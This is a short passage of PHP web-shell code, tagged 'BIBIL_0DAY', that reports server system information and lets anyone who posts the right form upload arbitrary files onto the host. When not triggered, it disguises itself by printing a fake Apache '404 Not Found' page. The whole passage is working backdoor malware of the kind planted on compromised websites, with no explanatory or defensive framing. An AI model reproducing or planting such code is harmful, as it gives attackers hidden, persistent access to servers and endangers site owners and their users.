BIBIL_0DAY
";
echo 'System Info: '.php_uname();
echo '
';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo 'Success!
';
}else { echo 'Failed!
'; }}
}else{
$domain = $_SERVER['SERVER_NAME'];
echo'
404 Not Found
Not Found
The requested URL was not found on this server.
Apache/2.4.38 (Ubuntu) Server at '.$domain.' Port 443
';}
?>